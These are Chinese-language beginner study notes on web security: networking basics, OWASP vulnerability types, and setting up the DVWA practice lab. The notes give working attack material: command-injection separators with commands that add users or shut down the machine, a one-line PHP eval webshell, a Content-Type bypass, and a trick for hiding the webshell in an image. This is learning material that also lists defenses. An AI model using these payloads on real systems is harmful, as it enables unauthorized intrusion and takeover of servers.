什么是网安？

账号被盗，密码简单被破解

隐私泄露，信息冒用

（在非法网站是录入个人信息，其他网站被攻击导致信息泄露

外快：SRC挖掘和HW行动

功能：渗透测试，安全服务，安全运维

渗透测试：游戏  看门狗2

在授权的条件下，找到系统漏洞

学习路径，网络基础，HTTP协议

计算机基础，网路基础，web漏洞，渗透测试

TCP/IP体系结构->传输层

http->应用层

什么是ip协议？

    ip地址和端口：在互联网的唯一标识，通过 DNS解析别人的ip地址

内网和公网

  公网可以和互联网互通，不需要端口映射。

端口：

  冯诺依曼：port  逻辑端口，不同服务监视不同端口  0-65535个

  80：http端口

  25：邮件端口

BS架构：浏览器，服务器

HTTP：超文本传输协议，规定统一的规范

网站攻击？常见漏洞？

OWASP组织

    SQL注入 xSS  文件上传  反序列化  文件包含 CSRF  命令执行  信息泄露  XXE SSRF 未授权访问

sql注入：破坏数据库

命令执行：

文件上传：上传头像，附件----》病毒

漏洞靶场  DVWA  ->学习攻击和修复方式

DVWA 搭建：PHP环境  和DVWA源代码

1,php study 下载  2018版 

2将DVWA放到WWW目录下，然后对DVWA的config目录进行配置dbuser和dbpassword为root root

3进入127.0.0.1/DAWA

命令执行：网络链接检测

|    ；   &  无论前面的命令是否成功都要执行后面的命令

||   仅在前面执行失败，才执行后面的

&&  仅在前面成功后执行后面的

            常用的cmd命令

whoami  查看当前的用户名

ipconfig   网卡信息

shutdown -s -t 0  关机

net user [username]  [password]   /add  增加一个新用户

type  [file_name]  查看文件内容

将 | ； & && ||  变为空来过滤攻击

渗透测试的解决方法：白盒   黑盒    是否能看到源代码

去掉“\”,用  .  分割数字，判断是否是四个数字和是否分割了四块 来检测IP 的检查

文件上传漏洞

需要对文件进行限制   webshell 后门文件

小马和大马

php 的一个木马

<?php eval($_GET[ 'pass '  ]);?>

插件hackbar  V2 

F12后，加载地址，post data  输入pass=system("????")

例如whoami,ipconfig~~~

webshell  管理工具----中国蚁剑  github 下载

防御：

限制文件传输的类型，压缩文件，限制文件大小，

对于文件类型的限制   可以用抓包工具直接修改后，可绕过并成功上传。

Content-Type  修改即可

所以需要获取文件的后缀名并加以限制，并获取图像信息的大小，如果上传的不是图片，则会失败报错。

但是这种方法可以用真实的图片来封装一个木马，并上传，合并后木马代码会添加到图片文档代码的最后面

在当前文件夹的cmd 中  copy /b 1.jpg+webshell.php  2.jpg

但是上传后并不会解析webshell

故配合使用 文件包含的漏洞进行攻击     【文件包含】主要会把读取的文件当作php代码执行

最终防御：压缩图像，重新编码生成图片。